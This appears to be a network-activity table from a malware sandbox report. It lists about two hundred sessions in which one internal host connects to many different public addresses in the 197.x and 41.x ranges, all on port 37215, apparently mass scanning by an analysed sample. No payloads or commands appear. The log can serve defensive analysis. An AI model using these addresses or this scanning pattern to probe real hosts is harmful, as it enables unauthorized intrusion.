                                                                            20758192.168.2.1534286197.155.198.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20759192.168.2.1550192197.100.137.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20760192.168.2.1550810197.68.103.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20761192.168.2.1534920197.246.41.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20762192.168.2.1558340197.172.51.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20763192.168.2.1541588197.226.155.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20764192.168.2.1539818197.44.253.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20765192.168.2.1551672197.169.241.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20766192.168.2.1534618197.204.153.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20767192.168.2.1556982197.70.126.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20768192.168.2.1552464197.159.12.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20769192.168.2.1536800197.219.30.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20770192.168.2.1545142197.19.47.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20771192.168.2.1552230197.220.1.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20772192.168.2.1542392197.224.100.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20773192.168.2.1535880197.112.16.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20774192.168.2.1546412197.177.11.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20775192.168.2.1542218197.29.40.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20776192.168.2.1541044197.100.38.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20777192.168.2.1552366197.11.201.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20778192.168.2.1540078197.40.68.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20779192.168.2.1544692197.82.8.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20780192.168.2.1538798197.161.222.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20781192.168.2.1537880197.75.147.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20782192.168.2.1549998197.98.41.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20783192.168.2.1545410197.164.13.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20784192.168.2.1556500197.71.169.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20785192.168.2.1544400197.254.214.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20786192.168.2.1533328197.74.190.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20787192.168.2.1537276197.27.148.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20788192.168.2.1536032197.8.247.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20789192.168.2.1541204197.40.229.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20790192.168.2.1558574197.40.25.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20791192.168.2.1538722197.179.53.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20792192.168.2.1549166197.247.176.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20793192.168.2.1550006197.57.101.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20794192.168.2.1555406197.123.119.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20795192.168.2.1536610197.187.243.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20796192.168.2.1560976197.3.107.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20797192.168.2.1540958197.243.182.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20798192.168.2.1535410197.82.95.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20799192.168.2.1541076197.31.73.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20800192.168.2.1537192197.53.93.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20801192.168.2.1549298197.79.174.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20802192.168.2.1552014197.53.203.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20803192.168.2.1540974197.10.138.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20804192.168.2.1539514197.150.171.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20805192.168.2.1547732197.46.77.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20806192.168.2.1552210197.59.53.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20807192.168.2.1557478197.49.129.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20808192.168.2.1536658197.97.40.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20809192.168.2.1547000197.73.244.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20810192.168.2.1543288197.121.217.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20811192.168.2.1554150197.45.157.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20812192.168.2.1556592197.163.214.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20813192.168.2.1542738197.149.26.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20814192.168.2.1544636197.67.44.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20815192.168.2.1537452197.70.147.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20816192.168.2.1546816197.218.237.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20817192.168.2.1536298197.34.178.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20818192.168.2.1534342197.241.84.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20819192.168.2.1540226197.113.70.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20820192.168.2.1553394197.80.46.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20821192.168.2.1556306197.53.151.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20822192.168.2.1532884197.126.105.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20823192.168.2.1541034197.4.126.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20824192.168.2.1533276197.211.118.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20825192.168.2.1537670197.207.33.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20826192.168.2.1536078197.87.86.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20827192.168.2.1546080197.89.60.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20828192.168.2.1539088197.211.159.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20829192.168.2.1560392197.18.204.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20830192.168.2.1554386197.118.69.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20831192.168.2.1559872197.110.249.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20832192.168.2.1539472197.108.55.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20833192.168.2.1545920197.253.200.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20834192.168.2.1552006197.178.64.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20835192.168.2.1557334197.77.43.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20836192.168.2.1558190197.183.41.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20837192.168.2.1550642197.154.94.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20838192.168.2.1548934197.45.104.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20839192.168.2.153535641.252.197.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20840192.168.2.155100041.247.52.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20841192.168.2.155108441.95.184.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20842192.168.2.154659441.42.255.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20843192.168.2.154979041.49.89.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20844192.168.2.154811641.143.250.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20845192.168.2.153694441.251.149.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20846192.168.2.155604241.26.172.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20847192.168.2.155964441.201.120.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20848192.168.2.153387441.129.170.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20849192.168.2.155311641.233.111.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20850192.168.2.153948241.181.254.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20851192.168.2.156022241.8.25.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20852192.168.2.154204041.223.176.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20853192.168.2.154231241.39.53.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20854192.168.2.156050041.181.104.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20855192.168.2.155955241.163.73.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20856192.168.2.154523441.252.246.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20857192.168.2.153458241.82.198.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20858192.168.2.155536241.161.65.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20859192.168.2.154241841.42.138.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20860192.168.2.154077841.23.245.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20861192.168.2.154094841.67.190.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20862192.168.2.154883041.148.21.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20863192.168.2.153898641.159.18.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20864192.168.2.153648241.188.138.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20865192.168.2.154277841.26.140.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20866192.168.2.154007641.200.177.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20867192.168.2.155623041.126.168.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20868192.168.2.153775041.197.241.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20869192.168.2.153732041.30.217.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20870192.168.2.153916641.137.158.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20871192.168.2.154505241.237.97.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20872192.168.2.153462441.103.204.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20873192.168.2.155998841.213.36.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20874192.168.2.155462441.85.49.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20875192.168.2.155817441.192.203.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20876192.168.2.153687441.1.79.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20877192.168.2.153798041.47.162.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20878192.168.2.153780441.201.150.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20879192.168.2.153364841.157.55.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20880192.168.2.155404441.94.189.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20881192.168.2.155231041.249.219.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20882192.168.2.154430241.120.176.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20883192.168.2.154936241.207.32.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20884192.168.2.155405441.219.221.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20885192.168.2.155601241.98.159.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20886192.168.2.155639241.153.99.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20887192.168.2.154337841.114.232.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20888192.168.2.154363641.22.253.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20889192.168.2.154598241.188.190.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20890192.168.2.155619041.151.54.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20891192.168.2.155177441.205.1.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20892192.168.2.154459841.242.81.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20893192.168.2.155356841.73.54.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20894192.168.2.153867841.77.75.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20895192.168.2.154369441.77.187.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20896192.168.2.154265241.138.206.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20897192.168.2.153823441.106.38.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20898192.168.2.155811641.71.234.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20899192.168.2.153807441.163.74.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20900192.168.2.155486641.188.156.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20901192.168.2.155037441.26.228.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20902192.168.2.154997441.233.253.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20903192.168.2.153308441.81.205.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20904192.168.2.155980041.79.109.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20905192.168.2.154437441.86.183.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20906192.168.2.154778841.163.220.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20907192.168.2.154608041.231.96.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20908192.168.2.153968641.123.12.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20909192.168.2.153582841.20.92.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20910192.168.2.153390641.78.140.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20911192.168.2.154469441.255.190.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20912192.168.2.154733441.72.219.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20913192.168.2.154887841.162.184.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20914192.168.2.154587641.34.37.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20915192.168.2.154441241.11.7.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20916192.168.2.154537641.23.68.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20917192.168.2.154433441.163.31.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20918192.168.2.155697241.118.0.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20919192.168.2.154906441.61.1.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20920192.168.2.154266841.20.201.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20921192.168.2.154437441.76.59.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20922192.168.2.154152441.208.233.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20923192.168.2.153634641.169.211.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20924192.168.2.155875441.104.165.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20925192.168.2.154064841.9.98.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20926192.168.2.153846241.73.18.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20927192.168.2.155762441.50.160.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20928192.168.2.155658241.234.62.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20929192.168.2.155117441.122.55.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20930192.168.2.154755841.3.199.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20931192.168.2.155620041.215.124.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20932192.168.2.154654641.122.20.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20933192.168.2.154442641.64.242.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20934192.168.2.154809041.113.47.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20935192.168.2.154087041.228.111.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20936192.168.2.154324641.192.160.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20937192.168.2.154018241.196.224.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20938192.168.2.154561441.73.150.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20939192.168.2.154697841.253.129.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20940192.168.2.153825441.241.53.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20941192.168.2.154637241.63.198.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20942192.168.2.154568041.36.79.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20943192.168.2.155652641.72.144.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20944192.168.2.154065241.98.159.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20945192.168.2.153676841.136.138.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20946192.168.2.155462641.35.207.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20947192.168.2.155549441.60.114.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20948192.168.2.154914441.71.36.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20949192.168.2.154340841.228.166.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20950192.168.2.155253441.157.136.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20951192.168.2.155097041.73.43.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20952192.168.2.154570841.255.10.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20953192.168.2.153766641.182.169.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20954192.168.2.155525441.214.103.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20955192.168.2.154691641.90.95.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20956192.168.2.153293241.141.122.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20957192.168.2.155747641.51.186.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20958192.168.2.155997241.239.25.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20959192.168.2.154081441.88.201.6437215
                                                                            TimestampBytes transferredDirectionData


